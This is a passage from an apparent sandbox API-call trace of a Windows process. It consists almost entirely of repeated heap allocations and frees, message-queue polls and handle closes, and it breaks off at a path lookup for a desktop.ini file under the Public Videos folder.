dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.379] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0268.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.382] FreeLibrary (hLibModule=0x74d40000) returned 1 [0268.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.382] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.382] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0268.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.382] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0268.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0268.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0268.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.385] CloseHandle (hObject=0x268) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0268.386] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0268.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0268.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0268.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0268.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0268.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.388] CloseHandle (hObject=0x2cc) returned 1 [0268.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0268.400] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0268.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0268.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0268.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0268.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.411] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0268.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0268.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0268.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0268.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0268.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x46) returned 0x2499760 [0268.417] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: 